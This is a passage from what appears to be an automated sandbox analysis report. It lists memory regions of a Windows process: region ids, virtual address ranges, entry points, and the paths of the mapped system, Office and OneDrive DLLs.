0x7ffb10dc0000 end_va = 0x7ffb10e0afff monitored = 0 entry_point = 0x7ffb10dd1590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 621 start_va = 0x7ffb10ec0000 end_va = 0x7ffb10f36fff monitored = 0 entry_point = 0x7ffb10ec2af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 622 start_va = 0x7ffb123d0000 end_va = 0x7ffb123e6fff monitored = 0 entry_point = 0x7ffb123d2790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 623 start_va = 0x7ffb12740000 end_va = 0x7ffb1275efff monitored = 0 entry_point = 0x7ffb127437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 624 start_va = 0x7ffb12760000 end_va = 0x7ffb127d8fff monitored = 0 entry_point = 0x7ffb127676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 625 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 626 start_va = 0x7ffb130f0000 end_va = 0x7ffb13298fff monitored = 0 entry_point = 0x7ffb13144060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 627 start_va = 0x7ffb14620000 end_va = 0x7ffb14667fff monitored = 0 entry_point = 0x7ffb1462a430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 628 start_va = 0x7ffb14670000 end_va = 0x7ffb14684fff monitored = 0 entry_point = 0x7ffb14675740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 629 start_va = 0x7ffb146e0000 end_va = 0x7ffb1471dfff monitored = 0 entry_point = 0x7ffb146e9650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 630 start_va = 0x7ffb174f0000 end_va = 0x7ffb176a7fff monitored = 0 entry_point = 0x7ffb1755e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 631 start_va = 0x7ffb19480000 end_va = 0x7ffb194c1fff monitored = 0 entry_point = 0x7ffb19482230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 632 start_va = 0x7ffb194d0000 end_va = 0x7ffb194dffff monitored = 0 entry_point = 0x7ffb194d78e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 633 start_va = 0x7ffb196d0000 end_va = 0x7ffb1970ffff monitored = 0 entry_point = 0x7ffb196e6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 634 start_va = 0x7ffb19710000 end_va = 0x7ffb19746fff monitored = 0 entry_point = 0x7ffb197120a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 635 start_va = 0x7ffb19750000 end_va = 0x7ffb19a89fff monitored = 0 entry_point = 0x7ffb19758520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 636 start_va = 0x7ffb19a90000 end_va = 0x7ffb19b2dfff monitored = 0 entry_point = 0x7ffb19ad9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 637 start_va = 0x7ffb19b30000 end_va = 0x7ffb19b46fff monitored = 0 entry_point = 0x7ffb19b3c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 638 start_va = 0x7ffb19b50000 end_va = 0x7ffb19d63fff monitored = 0 entry_point = 0x7ffb19b51000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 639 start_va = 0x7ffb19d70000 end_va = 0x7ffb19ffdfff monitored = 0 entry_point = 0x7ffb19e40f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 640 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 641 start_va = 0x7ffb1a010000 end_va = 0x7ffb1a0fefff monitored = 0 entry_point = 0x7ffb1a0329cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 642 start_va = 0x7ffb1a100000 end_va = 0x7ffb1a1a5fff monitored = 0 entry_point = 0x7ffb1a14efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 643 start_va = 0x7ffb1a1b0000 end_va = 0x7ffb1a33efff monitored = 0 entry_point = 0x7ffb1a1c01d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 644 start_va = 0x7ffb1a340000 end_va = 0x7ffb1a34cfff monitored = 0 entry_point = 0x7ffb1a341ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 645 start_va = 0x7ffb1a3c0000 end_va = 0x7ffb1a40cfff monitored = 0 entry_point = 0x7ffb1a3d7de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 646 start_va = 0x7ffb1a410000 end_va = 0x7ffb1a46bfff monitored = 0 entry_point = 0x7ffb1a427190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 647 start_va = 0x7ffb1a470000 end_va = 0x7ffb1a506fff monitored = 0 entry_point = 0x7ffb1a47ddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 648 start_va = 0x7ffb1a510000 end_va = 0x7ffb1a521fff monitored = 0 entry_point = 0x7ffb1a513580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 649 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 650 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 651 start_va = 0x7ffb1a660000 end_va = 0x7ffb1a6f3fff monitored = 0 entry_point = 0x7ffb1a699210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 652 start_va = 0x7ffb1a700000 end_va = 0x7ffb1a9a2fff monitored = 0 entry_point = 0x7ffb1a726190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 653 start_va = 0x7ffb1a9b0000 end_va = 0x7ffb1aa2ffff monitored = 0 entry_point = 0x7ffb1a9dd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 654 start_va = 0x7ffb1aa30000 end_va = 0x7ffb1aa51fff monitored = 0 entry_point = 0x7ffb1aa32580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 655 start_va = 0x7ffb1aa60000 end_va = 0x7ffb1aa6bfff monitored = 0 entry_point = 0x7ffb1aa614b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 656 start_va = 0x7ffb1aa70000 end_va = 0x7ffb1aa85fff monitored = 0 entry_point = 0x7ffb1aa71d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 657 start_va = 0x7ffb1aa90000 end_va = 0x7ffb1aab5fff monitored = 0 entry_point = 0x7ffb1aaa5cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 658 start_va = 0x7ffb1aac0000 end_va = 0x7ffb1aaeafff monitored = 0 entry_point = 0x7ffb1aac4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 659 start_va = 0x7ffb1ac60000 end_va = 0x7ffb1ac85fff monitored = 0 entry_point = 0x7ffb1ac61cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 660 start_va = 0x7ffb1ac90000 end_va = 0x7ffb1ad6afff monitored = 0 entry_point = 0x7ffb1aca28b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 661 start_va = 0x7ffb1ad70000 end_va = 0x7ffb1adf5fff monitored = 0 entry_point = 0x7ffb1ad91e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 662 start_va = 0x7ffb1ae00000 end_va = 0x7ffb1aed9fff monitored = 0 entry_point = 0x7ffb1ae33c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 663 start_va = 0x7ffb1aee0000 end_va = 0x7ffb1aefafff monitored = 0 entry_point = 0x7ffb1aeeaf40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 664 start_va = 0x7ffb1af20000 end_va = 0x7ffb1b03ffff monitored = 0 entry_point = 0x7ffb1af58310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 665 start_va = 0x7ffb1b040000 end_va = 0x7ffb1b04bfff monitored = 0 entry_point = 0x7ffb1b0418b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 666 start_va = 0x7ffb1b050000 end_va = 0x7ffb1b09cfff monitored = 0 entry_point = 0x7ffb1b05d180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 667 start_va = 0x7ffb1b0a0000 end_va = 0x7ffb1bbaafff monitored = 0 entry_point = 0x7ffb1b1ea540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 668 start_va = 0x7ffb1bbb0000 end_va = 0x7ffb1bbfffff monitored = 0 entry_point = 0x7ffb1bbb2580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 669 start_va = 0x7ffb1bc00000 end_va = 0x7ffb1c09ffff monitored = 0 entry_point = 0x7ffb1bc98740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 670 start_va = 0x7ffb1c0a0000 end_va = 0x7ffb1c0e9fff monitored = 0 entry_point = 0x7ffb1c0a5800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 671 start_va = 0x7ffb1c0f0000 end_va = 0x7ffb1c159fff monitored = 0 entry_point = 0x7ffb1c105e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 672 start_va = 0x7ffb1c160000 end_va = 0x7ffb1c1c4fff monitored = 0 entry_point = 0x7ffb1c164c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 673 start_va = 0x7ffb1c1d0000 end_va = 0x7ffb1c443fff monitored = 0 entry_point = 0x7ffb1c240400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 674 start_va = 0x7ffb1c450000 end_va = 0x7ffb1c464fff monitored = 0 entry_point = 0x7ffb1c452c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 675 start_va = 0x7ffb1c470000 end_va = 0x7ffb1c53dfff monitored = 0 entry_point = 0x7ffb1c4a14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 676 start_va = 0x7ffb1c540000 end_va = 0x7ffb1c638fff monitored = 0 entry_point = 0x7ffb1c588000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 677 start_va = 0x7ffb1c640000 end_va = 0x7ffb1c6f0fff monitored = 0 entry_point = 0x7ffb1c6508f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 678 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 679 start_va = 0x7ffb1c720000 end_va = 0x7ffb1c74afff monitored = 0 entry_point = 0x7ffb1c72c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 680 start_va = 0x7ffb1c750000 end_va = 0x7ffb1c85cfff monitored = 0 entry_point = 0x7ffb1c77f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 681 start_va = 0x7ffb1c8e0000 end_va = 0x7ffb1c93efff monitored = 0 entry_point = 0x7ffb1c90bce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 682 start_va = 0x7ffb1cb40000 end_va = 0x7ffb1cb54fff monitored = 0 entry_point = 0x7ffb1cb41ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 683 start_va = 0x7ffb1cc80000 end_va = 0x7ffb1cedcfff monitored = 0 entry_point = 0x7ffb1cd08610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 684 start_va = 0x7ffb1cee0000 end_va = 0x7ffb1cee8fff monitored = 0 entry_point = 0x7ffb1cee1480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 685 start_va = 0x7ffb1d280000 end_va = 0x7ffb1d2cafff monitored = 0 entry_point = 0x7ffb1d297b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 686 start_va = 0x7ffb1d3f0000 end_va = 0x7ffb1d40afff monitored = 0 entry_point = 0x7ffb1d3f1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 687 start_va = 0x7ffb1d410000 end_va = 0x7ffb1d697fff monitored = 0 entry_point = 0x7ffb1d46f670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 688 start_va = 0x7ffb1d700000 end_va = 0x7ffb1d70dfff monitored = 0 entry_point = 0x7ffb1d701460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 689 start_va = 0x7ffb1d800000 end_va = 0x7ffb1d80bfff monitored = 0 entry_point = 0x7ffb1d801860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 690 start_va = 0x7ffb1d810000 end_va = 0x7ffb1d8bbfff monitored = 0 entry_point = 0x7ffb1d8159c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 691 start_va = 0x7ffb1da70000 end_va = 0x7ffb1dab0fff monitored = 0 entry_point = 0x7ffb1da74840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 692 start_va = 0x7ffb1db30000 end_va = 0x7ffb1db43fff monitored = 0 entry_point = 0x7ffb1db350c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 693 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 694 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 695 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 696 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 697 start_va = 0x7ffb1df50000 end_va = 0x7ffb1dfbcfff monitored = 0 entry_point = 0x7ffb1df5d750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 698 start_va = 0x7ffb1dfc0000 end_va = 0x7ffb1dfcafff monitored = 0 entry_point = 0x7ffb1dfc1a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 699 start_va = 0x7ffb1e070000 end_va = 0x7ffb1e085fff monitored = 0 entry_point = 0x7ffb1e071b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 700 start_va = 0x7ffb1e100000 end_va = 0x7ffb1e127fff monitored = 0 entry_point = 0x7ffb1e108c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 701 start_va = 0x7ffb1e2e0000 end_va = 0x7ffb1e32dfff monitored = 0 entry_point = 0x7ffb1e2f1ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 702 start_va = 0x7ffb1e5c0000 end_va = 0x7ffb1e5e2fff monitored = 0 entry_point = 0x7ffb1e5c99a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 703 start_va = 0x7ffb1e5f0000 end_va = 0x7ffb1e608fff monitored = 0 entry_point = 0x7ffb1e5f4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 704 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 705 start_va = 0x7ffb1ea00000 end_va = 0x7ffb1eaadfff monitored = 0 entry_point = 0x7ffb1ea180c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 706 start_va = 0x7ffb1ec10000 end_va = 0x7ffb1ec64fff monitored = 0 entry_point = 0x7ffb1ec13fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 707 start_va = 0x7ffb1f150000 end_va = 0x7ffb1f30cfff monitored = 0 entry_point = 0x7ffb1f17af90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 708 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 709 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 710 start_va = 0x7ffb20820000 end_va = 0x7ffb208c8fff monitored = 0 entry_point = 0x7ffb20849010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 711 start_va = 0x7ffb208d0000 end_va = 0x7ffb209ddfff monitored = 0 entry_point = 0x7ffb2091eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 712 start_va = 0x7ffb209e0000 end_va = 0x7ffb20a49fff monitored = 0 entry_point = 0x7ffb209e9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 713 start_va = 0x7ffb20a50000 end_va = 0x7ffb20ae7fff monitored = 0 entry_point = 0x7ffb20a73980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 714 start_va = 0x7ffb20af0000 end_va = 0x7ffb20b8ffff monitored = 0 entry_point = 0x7ffb20b156b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 715 start_va = 0x7ffb20b90000 end_va = 0x7ffb20c11fff monitored = 0 entry_point = 0x7ffb20b94ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 716 start_va = 0x7ffb20c20000 end_va = 0x7ffb20c7cfff monitored = 0 entry_point = 0x7ffb20c26c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 717 start_va = 0x7ffb20c80000 end_va = 0x7ffb20cd0fff monitored = 0 entry_point = 0x7ffb20c825e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 718 start_va = 0x7ffb20ec0000 end_va = 0x7ffb20f2ffff monitored = 0 entry_point = 0x7ffb20ee2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 719 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 720 start_va = 0x7ffb21110000 end_va = 0x7ffb21170fff monitored = 0 entry_point = 0x7ffb21114b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 721 start_va = 0x7ffb21640000 end_va = 0x7ffb216d1fff monitored = 0 entry_point = 0x7ffb2168a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 722 start_va = 0x7ffb21760000 end_va = 0x7ffb217d9fff monitored = 0 entry_point = 0x7ffb21787630 region_type = mapped_file name = 